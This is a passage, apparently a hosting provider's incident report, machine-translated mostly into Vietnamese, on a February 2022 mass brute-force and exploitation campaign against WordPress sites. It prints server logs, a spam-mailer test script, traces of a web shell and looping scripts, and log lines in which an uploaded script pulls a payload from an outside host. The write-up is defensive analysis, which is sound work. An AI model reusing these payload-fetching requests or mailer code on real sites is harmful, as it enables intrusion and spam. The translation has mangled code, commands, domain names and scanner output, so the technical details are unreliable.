Hệ thống quản lý nội dung [CMS] được sử dụng rộng rãi, chẳng hạn như Wordpress, Joomla, Drupal và các hệ thống khác là mục tiêu đáng hoan nghênh cho các nỗ lực hack. Thỉnh thoảng, một CMS như vậy lại bị tấn công - chủ yếu là do khai thác lỗ hổng. Trong hầu hết các trường hợp, người đáng trách thực sự là quản trị viên trang web/quản trị viên trang web của CMS bị ảnh hưởng. Để một ứng dụng web chưa được vá cũng giống như không bao giờ vá Hệ điều hành - với bề mặt tấn công thậm chí còn dễ dàng hơn
Nhiều khai thác lỗ hổng mới được phát hành
Trong vài ngày qua [tháng 2 năm 2022], nhiều lỗ hổng Wordpress mới đã được công khai, bao gồm các tập lệnh và bằng chứng về khái niệm cách khai thác các lỗ hổng này.
Cuộc tấn công vũ phu quy mô lớn vào ngày 16 tháng 2
Vào tối ngày 16 tháng 2, chúng tôi đã phát hiện ra một lượng lớn yêu cầu trên máy chủ lưu trữ chia sẻ của khách hàng. Đầu tiên chúng tôi nghi ngờ một cuộc tấn công DOS, bắt nguồn từ một dải mạng ở Tây Ban Nha [37. 120. 142. 0/24; . Nhưng xem xét kỹ hơn các yêu cầu cho thấy rằng không chỉ một trang web bị nhắm mục tiêu - nhiều tên miền khác nhau đã bị tấn công cùng một lúc. Tất cả các trang web đều có một điểm chung. Tất cả đều sử dụng Wordpress
Từ trạng thái máy chủ của Apache
80-1 9461 0/525/1584 W 1. 02 0 0 0. 0 2. 60 9. 07 37. 120. 142. 25 http/1. 1 ví dụ1. com. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
83-1 23169 0/1025/2339 W 2. 17 1 0 0. 0 5. 76 16. 72 37. 120. 142. 25 http/1. 1 ví dụ2. de. 7081 ĐĂNG //xmlrpc. php HTTP/1. 0
84-1 23213 0/304/1363 W 0. 62 12 0 0. 0 1. 47 7. 12 37. 120. 142. 25 http/1. 1 ví dụ3. ch. 7081 ĐĂNG //xmlrpc. php HTTP/1. 0
87-1 17995 0/399/3266 W 0. 89 2 0 0. 0 2. 58 22. 49 37. 120. 142. 25 http/1. 1 ví dụ4. bọc lưới. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
88-1 21627 0/343/1436 W 0. 74 0 0 0. 0 1. 71 7. 06 37. 120. 142. 25 http/1. 1 ví dụ5. ch. 7081 ĐĂNG //xmlrpc. php HTTP/1. 0
89-1 3896 0/28/846 W 0. 28 4 0 0. 0 0. 11 5. 05 37. 120. 142. 25 http/1. 1 ví dụ6. ch. 7081 ĐĂNG //xmlrpc. php HTTP/1. 0
90-1 31157 0/151/1285 W 0. 31 10 0 0. 0 0. 62 6. 26 37. 120. 142. 25 http/1. 1 ví dụ7. ch. 7081 ĐĂNG //xmlrpc. php HTTP/1. 0
94-1 9471 0/560/846 W 1. 20 2 0 0. 0 2. 98 4. 59 37. 120. 142. 25 http/1. 1 ví dụ8. bọc lưới. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
95-1 3906 0/28/648 _ 0. 05 0 4536 0. 0 0. 09 3. 45 37. 120. 142. 25 http/1. 1 ví dụ4. bọc lưới. 7080 ĐĂNG /xmlrpc. php HTTP/1. 0
96-1 18000 0/373/898 W 0. 76 3 0 0. 0 2. 28 4. 95 37. 120. 142. 25 http/1. 1 ví dụ9. com. 7081 POST //wp-đăng nhập. php HTTP/1. 0
97-1 28399 0/831/837 W 1. 69 2 0 0. 0 4. 69 4. 71 37. 120. 142. 25 http/1. 1 ví dụ14. ch. 7081 POST //wp-đăng nhập. php HTTP/1. 0
100-1 18002 0/409/800 W 0. 77 3 0 0. 0 2. 62 4. 60 37. 120. 142. 25 http/1. 1 ví dụ15. ch. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
101-1 23244 0/287/837 W 0. 59 3 0 0. 0 1. 22 4. 21 37. 120. 142. 25 http/1. 1 ví dụ14. ch. 7081 POST //wp-đăng nhập. php HTTP/1. 0
102-1 21632 0/333/808 W 0. 62 2 0 0. 0 2. 01 6. 11 37. 120. 142. 25 http/1. 1 ví dụ9. com. 7081 POST //wp-đăng nhập. php HTTP/1. 0
104-1 9498 0/567/866 W 1. 18 5 0 0. 0 3. 07 4. 70 37. 120. 142. 25 http/1. 1 ví dụ10. com. 7080 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
106-1 3915 0/23/759 W 0. 11 1 0 0. 0 0. 10 5. 48 37. 120. 142. 25 http/1. 1 ví dụ11. ch. 7080 ĐĂNG //xmlrpc. php HTTP/1. 0
108-1 3917 0/29/588 W 0. 07 10 0 0. 0 0. 12 4. 67 37. 120. 142. 25 http/1. 1 ví dụ12. ch. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
109-1 3918 0/21/691 W 0. 07 1 0 0. 0 0. 10 4. 50 37. 120. 142. 25 http/1. 1 ví dụ10. com. 7080 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
113-1 3923 0/19/546 W 0. 06 0 0 0. 0 0. 11 3. 97 37. 120. 142. 25 http/1. 1 ví dụ13. ch. 7080 ĐĂNG //xmlrpc. php HTTP/1. 0
115-1 12306 0/510/725 W 1. 08 10 0 0. 0 2. 76 4. 13 37. 120. 142. 25 http/1. 1 ví dụ16. ch. 708 ĐĂNG //xmlrpc. php HTTP/1. 0
116-1 18771 0/374/709 W 0. 71 3 0 0. 0 2. 28 4. 37 37. 120. 142. 25 http/1. 1 ví dụ17. ch. 7081 POST //wp-đăng nhập. php HTTP/1. 0
117-1 9507 0/566/716 W 1. 24 8 0 0. 0 3. 24 4. 20 37. 120. 142. 25 http/1. 1 ví dụ18. ch. 7081 POST //wp-đăng nhập. php HTTP/1. 0
118-1 9512 0/554/739 W 1. 16 10 0 0. 0 2. 96 3. 85 37. 120. 142. 25 http/1. 1 ví dụ19. ch. 7081 POST //wp-đăng nhập. php HTTP/1. 0
120-1 3925 0/33/529 W 0. 09 0 0 0. 0 0. 13 2. 69 37. 120. 142. 25 http/1. 1 ví dụ20. com. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
121-1 9517 0/578/688 W 1. 10 2 0 0. 0 3. 69 4. 34 37. 120. 142. 25 http/1. 1 ví dụ4. bọc lưới. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
Gửi yêu cầu POST lớn tới wp-login. php và xmlrpc. php thường chỉ ra một cuộc tấn công vũ phu đang cố gắng tìm các kết hợp thông tin xác thực chính xác. Cả hai tập lệnh này [theo mặc định] không có bất kỳ kết nối hoặc giới hạn số lần đăng nhập sai nào do đó chúng là mục tiêu đáng hoan nghênh cho các cuộc tấn công này
Ghi chú. Xem bài viết liên quan cách bảo vệ blog Wordpress của bạn khỏi các cuộc tấn công đăng nhập vũ phu
Các cuộc tấn công vũ phu như vậy xảy ra thường xuyên trên một trang Wordpress - nhưng quy mô của cuộc tấn công này khiến chúng tôi ngạc nhiên. Kẻ tấn công phải có sẵn cơ sở dữ liệu cài đặt Wordpress [toàn cầu]
Ở đỉnh điểm của cuộc tấn công, cuộc tấn công đã sử dụng băng thông ~13MB/s [= 104 Mbit/s]
Tất nhiên, chúng tôi đã chặn các cuộc tấn công ngay khi chúng tôi [giám sát của chúng tôi] phát hiện ra chúng, nhưng liệu kẻ tấn công có thành công hay không thì chỉ có thời gian mới trả lời được.
ngày hôm sau. Một số cài đặt Wordpress bị ảnh hưởng
Ngày hôm sau, chúng tôi tìm thấy một vài cài đặt Wordpress đã bị tấn công. Bằng cách khai thác lỗ hổng hoặc bằng cách tìm tổ hợp đăng nhập chính xác từ cuộc tấn công vũ phu. Nhưng vụ hack thành công dẫn đến nhiều tình huống khác nhau, cách truy cập đã cố gắng được sử dụng.
trường hợp cổ điển. gửi thư rác
Tất nhiên, gửi thư rác luôn là một trong những mục tiêu. Đặc biệt nếu máy chủ không nằm trong bất kỳ danh sách đen nào, điều này mang lại cho máy chủ độ tin cậy [smtp] cao hơn - nhưng nó cũng thú vị hơn đối với những kẻ gửi thư rác. Trên một lần cài đặt Wordpress, chúng tôi đã tìm thấy các tệp đã tải lên có chứa phần mềm độc hại Leaf PHP Mailer. Tập lệnh PHP này được biết đến với việc gửi hàng loạt e-mail và thậm chí bao gồm kiểm tra DNSBL
root@server ~ # ll /var/www/vhosts/example4. net/httpdocs/miền/unz. php
-rw-r--r-- 1 ví dụ4 psacln 166104 17 tháng 2 06. 32 /var/www/vhosts/example4. net/httpdocs/miền/unz. php
root@server ~ # thêm /var/www/vhosts/example4. net/httpdocs/miền/unz. php
/**
* Leaf PHP Mailer của [leafmailer. pw]
* @version. 2. 8
**/
$mật khẩu = "";
Trước khi tải lên unz. php, một tập lệnh PHP khác [người kiểm tra. php] đã được tải lên để kiểm tra khả năng gửi e-mail
root@server # người kiểm tra chỉ số. php
Tệp. kiểm thử. php
Kích thước. 796 Khối. 8 Khối IO. 4096 tệp thông thường
Thiết bị. fe02h/65026d Inode. 53901849 Liên kết. 1
Quyền truy cập. [0644/-rw-r--r--] Uid. [10026/ ví dụ4] Gid. [ 1005/ psacln]
Quyền truy cập. 2022-02-17 02. 46. 03. 546900843 +0100
Sửa đổi. 2022-02-17 02. 45. 59. 195004007 +0100
Thay đổi. 2022-02-17 02. 45. 59. 195004007 +0100
Sinh. -
root@server # người kiểm tra mèo. php
error_reporting[0];
echo '
Trình kiểm tra gửi email
Viết email của bạn và nhấp vào gửi kiểm tra email
';
if [isset[ . ". $rnd , "ĐANG LÀM VIỆC. "];
{
$rnd = rand[];
mail[$_POST['email'],"Email Sending Test Report ID: " . $rnd ,"WORKING!"];
in "Email được gửi đến. ". $_POST['email']. ", ID báo cáo. ". $rnd. "";
}
By analyzing how tester. php appeared on the server, yet another file [local. php] was detected. Looking closer at it revealed it's a [beautiful] web shell
Once such a web shell is on the server, it's very easy for an attacker to upload additional and manipulate and delete existing files.
But when did this web shell get on the server? Another analysis showed it was uploaded on February 16th, during the mass attack.
root@server # ls -l local. php
-rw-r--r-- 1 example4 psacln 39507 Feb 16 22. 01 local. php
Obviously the attack on February 16h was not only a brute-force attack. The attack also involved exploiting vulnerabilities and uploading new files [such as web shells]
Another case. Launching [loop] scripts
A rather rare case is the execution of scripts which keep running as a process. This was also detected following the attacks on February 16
root@server ~ # ps auxf. khóa grep360. php
root 6814 0. 0 0. 0 6076 832 pts/6 S+ 08. 37 0. 00 \_ grep --color=auto lock360. php
10207 10279 0. 0 0. 0 361172 38688 ? S 07. 33 0. 03 \_ /opt/plesk/php/7. 3/bin/php /var/www/vhosts/example8. net/httpdocs/wp-admin/css/colors/blue/lock360. php
Bằng cách sử dụng strace trên PID, chúng ta có thể thấy rằng tập lệnh đang chạy trong một vòng lặp, do đó giữ cho quá trình tồn tại
Interesting in this case was that the process was launched via HTTP
173. 208. 202. 234 - - [17/Feb/2022. 07. 33. 54 +0100] "GET /wp-admin/css/colors/blue/lock360. php?action=lock HTTP/1. 0" 200 1044 "http. //example8. net/wp-admin/css/colors/blue/lock360. php?action=check" "Mozilla/5. 0 [Windows NT 6. 3; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/98. 0. 4758. 102 Safari/537. 36"
This seems to start the process but at the same time deleted the file itself - which removes it from the filesystem, however it is kept in memory by the running process
Other similar processes were detected on the system, all with similar names
example19 2777 0. 0 0. 0 361108 36436 ? S 04. 45 0. 03 /opt/plesk/php/7. 3/bin/php /var/www/vhosts/example19. ch/httpdocs/l. php
example2 5442 0. 0 0. 0 376740 41028 ? S 06. 36 0. 01 /opt/plesk/php/5. 6/bin/php /var/www/vhosts/example2. de/httpdocs/lock666. php
Unfortunately as the files were removed from the file system as soon as they are launched, we could not analyze it. But we believe the purpose of these processes was to attack other remote servers
Update. We REALLY wanted to find out, what the process is doing, so we went into deep-dive analysis. In our next article, we share our technical analysis of a deleted script running as a process and reading its PHP code from memory
Downloading additional scripts
Another way a hacked Wordpress can be abused, is to use the malicious files to download additional files from a remote source. Here nicely seen by using an uploaded script [up. php]
62. 201. 241. 20 - - [16/02/2022. 22. 20. 38 +0100] "GET /wp-content/plugins/patixrzkax/up. php HTTP/1. 0" 200 576 "yahoo. com" "Mozilla/5. 0 [Windows NT 10. 0; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/90. 0. 4430. 85 Safari/537. 36"
62. 201. 241. 20 - - [16/Feb/2022. 22. 26. 58 +0100] "POST /wp-content/plugins/patixrzkax/up. php?php=anonymousfox. is/__@v6PnSVM/p1. txt HTTP/1. 0" 200 603 "yahoo. com" "Mozilla/5. 0 [Windows NT 10. 0; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/90. 0. 4430. 85 Safari/537. 36"
62. 201. 241. 20 - - [16/Feb/2022. 22. 27. 01 +0100] "POST /wp-content/plugins/patixrzkax/up. php?php=anonymousfox. is/__@v6PnSVM/p1. txt HTTP/1. 0" 200 649 "yahoo. com" "Mozilla/5. 0 [Windows NT 10. 0; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/90. 0. 4430. 85 Safari/537. 36"
Điều đặc biệt khó chịu ở đây là thực tế rằng tên miền ẩn danhfox. được lưu trữ phía sau proxy CloudFlare. Có thể chặn các yêu cầu gửi đi đến phạm vi Cloudflare, nhưng các ứng dụng khác [đang hoạt động và hợp pháp] cũng có thể bị ảnh hưởng.
Phát hiện lỗ hổng Wordpress
May mắn thay, có sẵn một số trình quét lỗ hổng [mã nguồn mở] rất tốt, giúp bạn phát hiện ra bất kỳ lỗ hổng Wordpress [đã biết] nào. Một trong những trình quét được sử dụng nhiều nhất là wpscan, một trình quét tốt khác là Pompem. Mặc dù cái sau không được cập nhật trong nhiều năm, nhưng nó vẫn hoạt động để phát hiện các lỗ hổng gần đây
Ở đây chúng tôi cho phép pompem chạy trên một trong những trang Wordpress bị ảnh hưởng
root@server /var/www/vhosts/example19. ch/httpdocs # pompem -s Wordpress
[. ]
+Kết quả Wordpress
+----------------------- . Trình tạo hồ sơ WordPress Cozmoslabs 3. 6. 1 Chéo S. https. //packetstormbảo mật. com/files/166029/WordPress-Cozmoslabs-Profile-Builder-3. 6. 1-Cross-Site-Scripting. html
+Date Description Url
+----------------------------------------------------------------------------------------------------+
+ 2022-02-17 | WordPress Cozmoslabs Profile Builder 3.6.1 Cross S | //packetstormsecurity.com/files/166029/WordPress-Cozmoslabs-Profile-Builder-3.6.1-Cross-Site-Scripting.html
+--------------------------------------- . WordPress Error Log Viewer 1. 1. 1 tập tin De tùy ý. https. //packetstormsecurity. com/files/165985/WordPress-Error-Log-Viewer-1. 1. 1-Arbitrary-File-Deletion. html
+ 2022-02-16 | WordPress Error Log Viewer 1.1.1 Arbitrary File De | //packetstormsecurity.com/files/165985/WordPress-Error-Log-Viewer-1.1.1-Arbitrary-File-Deletion.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-14 . WordPress International SMS For Contact Form 7 Int . https. //packetstormsecurity. com/files/165969/WordPress-International-SMS-For-Contact-Form-7-Integration-1. 2-CSRF. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress VeronaLabs WP Statistics 13. 1. 4 SQL Inje . https. //packetstormsecurity. com/files/165949/WordPress-VeronaLabs-WP-Statistics-13. 1. 4-SQL-Injection. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress Secure Copy Content Protection And Conte . https. //packetstormsecurity. com/files/165946/WordPress-Secure-Copy-Content-Protection-And-Content-Locking-2. 8. 1-SQL-Injection. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress Jetpack 9. 1 Cross Site Scripting . https. //packetstormsecurity. com/files/165942/WordPress-Jetpack-9. 1-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress 5. 9 Cross Site Scripting . https. //packetstormsecurity. com/files/165940/WordPress-5. 9-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress Simple Job Board 2. 9. 3 Local File Inclus . https. //packetstormsecurity. com/files/165892/WordPress-Simple-Job-Board-2. 9. 3-Local-File-Inclusion. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress Contact Form Builder 1. 6. 1 trang chéo Sc. https. //packetstormsecurity. com/files/165889/WordPress-Contact-Form-Builder-1. 6. 1-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress CP Blocks 1. 0. 14 Cross Site Scripting . https. //packetstormsecurity. com/files/165887/WordPress-CP-Blocks-1. 0. 14-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress Security Audit 1. 0. 0 Cross Site Scriptin . https. //packetstormsecurity. com/files/165886/WordPress-Security-Audit-1. 0. 0-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-07 . WordPress International SMS For Contact Form 7 Int . https. //packetstormsecurity. com/files/165883/WordPress-International-SMS-For-Contact-Form-7-Integration-1. 2-XSS. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-04 . WordPress IP2Location Country Blocker 2. 26. 7 Cross . https. //packetstormsecurity. com/files/165857/WordPress-IP2Location-Country-Blocker-2. 26. 7-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 . WordPress Learnpress 4. 1. 4. 1 Arbitrary Image Renam . https. //packetstormsecurity. com/files/165825/WordPress-Learnpress-4. 1. 4. 1-Đổi tên hình ảnh tùy ý. html
+--------------------------------------- . Trình kiểm tra biểu mẫu liên hệ WordPress 1. 0. 2 XSS / Ac. https. //packetstormbảo mật. com/files/165814/WordPress-Contact-Form-Check-Tester-1. 0. 2-XSS-Kiểm soát truy cập. html
+ 2022-02-02 | WordPress Contact Form Check Tester 1.0.2 XSS / Ac | //packetstormsecurity.com/files/165814/WordPress-Contact-Form-Check-Tester-1.0.2-XSS-Access-Control.html
+--------------------------------------- . Kiểm tra tên miền WordPress 1. 0. 16 Tập lệnh chéo trang. https. //packetstormbảo mật. com/files/165811/WordPress-Domain-Check-1. 0. 16-Cross-Site-Scripting. html
+ 2022-02-02 | WordPress Domain Check 1.0.16 Cross Site Scripting | //packetstormsecurity.com/files/165811/WordPress-Domain-Check-1.0.16-Cross-Site-Scripting.html
+--------------------------------------- . Màn hình tải xuống WordPress WordPress 4. 4. 4 lệnh SQL. https. //packetstormbảo mật. com/files/165809/WordPress-Download-Monitor-WordPress-4. 4. 4-SQL-Tiêm. html
+ 2022-02-02 | WordPress Download Monitor WordPress 4.4.4 SQL Inj | //packetstormsecurity.com/files/165809/WordPress-Download-Monitor-WordPress-4.4.4-SQL-Injection.html
+--------------------------------------- . Thanh trượt sản phẩm WordPress cho WooC Commerce 1. 13. 21C. https. //packetstormbảo mật. com/files/165805/WordPress-Product-Slider-For-WooC Commerce-1. 13. 21-Cross-Site-Scripting. html
+ 2022-02-02 | WordPress Product Slider For WooCommerce 1.13.21 C | //packetstormsecurity.com/files/165805/WordPress-Product-Slider-For-WooCommerce-1.13.21-Cross-Site-Scripting.html
+--------------------------------------- . Lưới bài đăng WordPress 2. 1. 1 Tập lệnh chéo trang. https. //packetstormbảo mật. com/files/165804/WordPress-Post-Grid-2. 1. 1-Cross-Site-Scripting. html
+ 2022-02-02 | WordPress Post Grid 2.1.1 Cross Site Scripting | //packetstormsecurity.com/files/165804/WordPress-Post-Grid-2.1.1-Cross-Site-Scripting.html
+--------------------------------------- . WordPress 404 đến 301 2. 0. 2 SQL tiêm. https. //packetstormbảo mật. com/files/165803/WordPress-404-To-301-2. 0. 2-SQL-Tiêm. html
+ 2022-02-02 | WordPress 404 To 301 2.0.2 SQL Injection | //packetstormsecurity.com/files/165803/WordPress-404-To-301-2.0.2-SQL-Injection.html
+--------------------------------------- . Đăng ký WordPressMagic V 5. 0. 1. 5 Tiêm SQL. https. //packetstormbảo mật. com/files/165746/WordPress-RegistrationMagic-V-5. 0. 1. 5-SQL-Tiêm. html
+ 2022-01-27 | WordPress RegistrationMagic V 5.0.1.5 SQL Injectio | //packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html
+--------------------------------------- . Lịch sự kiện WordPress hiện đại 6. 1 SQL Injection . https. //packetstormsecurity. com/files/165742/WordPress-Modern-Events-Calendar-6. 1-SQL-Injection. html
+ 2022-01-27 | WordPress Modern Events Calendar 6.1 SQL Injection | //packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-27 . WordPress Mortgage Calculators WP 1. 52 Cross Site . https. //packetstormsecurity. com/files/165734/WordPress-Mortgage-Calculators-WP-1. 52-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-19 . WordPress Email Template Designer – WP HTML . https. //packetstormsecurity. com/files/165606/WordPress-Email-Template-Designer-WP-HTML-Mail-3. 0. 9-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-13 . WordPress Core 5. 8. 2 SQL Injection . https. //packetstormsecurity. com/files/165540/WordPress-Core-5. 8. 2-SQL-Injection. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-12 . WordPress Frontend Uploader 1. 3. 2 Cross Site Scrip . https. //packetstormsecurity. com/files/165515/WordPress-Frontend-Uploader-1. 3. 2-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-10 . WordPress Contact Form Entries Cross Site Scriptin . https. //packetstormsecurity. com/files/165500/WordPress-Contact-Form-Entries-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 . WordPress Catch Themes Demo Import Shell Upload . https. //packetstormsecurity. com/files/165463/WordPress-Catch-Themes-Demo-Import-Shell-Upload. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 . WordPress AAWP 3. 16 Cross Site Scripting . https. //packetstormbảo mật. com/tệp/165451/WordPress-AAWP-3. 16-Cross-Site-Scripting. html
+--------------------------------------- . WordPress Trình xếp hạng thực sự 2. 2. 2 Đọc tệp tùy ý. https. //packetstormbảo mật. com/files/165434/WordPress-The-True-Ranker-2. 2. 2-Đọc tệp tùy ý. html
+ 2022-01-05 | WordPress The True Ranker 2.2.2 Arbitrary File Rea | //packetstormsecurity.com/files/165434/WordPress-The-True-Ranker-2.2.2-Arbitrary-File-Read.html
+--------------------------------------- . Thống kê khách truy cập WordPress WP 4. 7 Tiêm SQL. https. //packetstormbảo mật. com/files/165433/WordPress-WP-Khách-Thống kê-4. 7-SQL-Tiêm. html
+ 2022-01-05 | WordPress WP Visitor Statistics 4.7 SQL Injection | //packetstormsecurity.com/files/165433/WordPress-WP-Visitor-Statistics-4.7-SQL-Injection.html
+--------------------------------------- . Trình tạo hồ sơ WordPress Cozmoslabs 3. 6. 1 Chéo S. https. //cxan ninh. com/issue/WLB-2022020089
+ 2022-02-17 | WordPress Cozmoslabs Profile Builder 3.6.1 Cross S | //cxsecurity.com/issue/WLB-2022020089
+--------------------------------- . Trình xem nhật ký lỗi WordPress 1. 1. 1 tập tin De tùy ý. https. //cxan ninh. com/issue/WLB-2022020073
+ 2022-02-16 | WordPress Error Log Viewer 1.1.1 Arbitrary File De | //cxsecurity.com/issue/WLB-2022020073
+--------------------------------- . WordPress International SMS For Contact Form 7 Int. https. //cxan ninh. com/issue/WLB-2022020069
+ 2022-02-15 | WordPress International SMS For Contact Form 7 Int | //cxsecurity.com/issue/WLB-2022020069
+--------------------------------- . Bảo vệ và bảo vệ nội dung sao chép an toàn WordPress. https. //cxan ninh. com/issue/WLB-2022020068
+ 2022-02-14 | WordPress Secure Copy Content Protection And Conte | //cxsecurity.com/issue/WLB-2022020068
+--------------------------------- . Plugin WordPress Post Grid 2. 1. 1 tập lệnh trang web chéo. https. //cxan ninh. com/issue/WLB-2022020063
+ 2022-02-14 | WordPress Plugin Post Grid 2.1.1 Cross Site Script | //cxsecurity.com/issue/WLB-2022020063
+--------------------------------- . Plugin CP khối WordPress 1. 0. 14 Ngồi Thập Tự. https. //cxan ninh. com/issue/WLB-2022020052
+ 2022-02-09 | WordPress Plugin CP Blocks 1.0.14 Stored Cross Sit | //cxsecurity.com/issue/WLB-2022020052
+--------------------------------- . Thanh trượt sản phẩm plugin WordPress cho WooC Commerce 1. . https. //cxan ninh. com/issue/WLB-2022020042
+ 2022-02-08 | WordPress Plugin Product Slider for WooCommerce 1. | //cxsecurity.com/issue/WLB-2022020042
+--------------------------------- . Khối CP WordPress 1. 0. 14 Tập lệnh chéo trang. https. //cxan ninh. com/issue/WLB-2022020036
+ 2022-02-08 | WordPress CP Blocks 1.0.14 Cross Site Scripting | //cxsecurity.com/issue/WLB-2022020036
+--------------------------------- . Kiểm tra bảo mật WordPress 1. 0. 0 Tập lệnh chéo trang. https. //cxan ninh. com/issue/WLB-2022020034
+ 2022-02-08 | WordPress Security Audit 1.0.0 Cross Site Scriptin | //cxsecurity.com/issue/WLB-2022020034
+--------------------------------- . Trình chặn quốc gia IP2Location WordPress 2. 26. 7 chữ thập. https. //cxan ninh. com/issue/WLB-2022020031
+ 2022-02-07 | WordPress IP2Location Country Blocker 2.26.7 Cross | //cxsecurity.com/issue/WLB-2022020031
+--------------------------------- . WordPress International SMS For Contact Form 7 Int. https. //cxan ninh. com/issue/WLB-2022020021
+ 2022-02-07 | WordPress International SMS For Contact Form 7 Int | //cxsecurity.com/issue/WLB-2022020021
+--------------------------------- . Lưới bài đăng WordPress 2. 1. 1 Tập lệnh chéo trang. https. //cxan ninh. com/issue/WLB-2022020018
+ 2022-02-04 | WordPress Post Grid 2.1.1 Cross Site Scripting | //cxsecurity.com/issue/WLB-2022020018
+--------------------------------- . Học WordPress 4. 1. 4. 1 Renam ảnh tùy ý. https. //cxan ninh. com/issue/WLB-2022020014
+ 2022-02-03 | WordPress Learnpress 4.1.4.1 Arbitrary Image Renam | //cxsecurity.com/issue/WLB-2022020014
+--------------------------------- . Màn hình tải xuống WordPress WordPress 4. 4. 4 lệnh SQL. https. //cxan ninh. com/issue/WLB-2022020013
+ 2022-02-03 | WordPress Download Monitor WordPress 4.4.4 SQL Inj | //cxsecurity.com/issue/WLB-2022020013
+--------------------------------- . Thanh trượt sản phẩm WordPress cho WooC Commerce 1. 13. 21C. https. //cxan ninh. com/issue/WLB-2022020012
+ 2022-02-03 | WordPress Product Slider For WooCommerce 1.13.21 C | //cxsecurity.com/issue/WLB-2022020012
+--------------------------------- . Plugin Wordpress 404 đến 301 2. 0. 2 SQL-Injection [A. https. //cxan ninh. com/issue/WLB-2022020005
+ 2022-02-02 | Wordpress Plugin 404 to 301 2.0.2 SQL-Injection [A | //cxsecurity.com/issue/WLB-2022020005
+--------------------------------- . Lịch sự kiện WordPress hiện đại 6. 1 lần tiêm SQL. https. //cxan ninh. com/issue/WLB-2022010143
+ 2022-01-28 | WordPress Modern Events Calendar 6.1 SQL Injection | //cxsecurity.com/issue/WLB-2022010143
+--------------------------------- . Đăng ký WordPressMagic V 5. 0. 1. 5 Tiêm SQL. https. //cxan ninh. com/issue/WLB-2022010135
+ 2022-01-27 | WordPress RegistrationMagic V 5.0.1.5 SQL Injectio | //cxsecurity.com/issue/WLB-2022010135
+--------------------------------- . Máy tính thế chấp WordPress WP 1. 52 Trang web chéo. https. //cxan ninh. com/issue/WLB-2022010131
+ 2022-01-27 | WordPress Mortgage Calculators WP 1.52 Cross Site | //cxsecurity.com/issue/WLB-2022010131
+--------------------------------- . Plugin WordPress Thống kê khách truy cập WP 4. 7 lệnh SQL. https. //cxan ninh. com/issue/WLB-2022010098
+ 2022-01-18 | WordPress Plugin WP Visitor Statistics 4.7 SQL Inj | //cxsecurity.com/issue/WLB-2022010098
+---------------------------------
Mặc dù bản cài đặt Wordpress này đã được cập nhật [có thể là vào tháng 1 năm 2022 như đầu ra gợi ý], nhưng điều đó là không đủ để theo kịp các lỗ hổng gần đây. Bản cập nhật hàng tuần thực sự là bắt buộc đối với mọi cài đặt Wordpress. Nhưng như đã viết ở trên. Điều này phụ thuộc vào quản trị viên trang web có trách nhiệm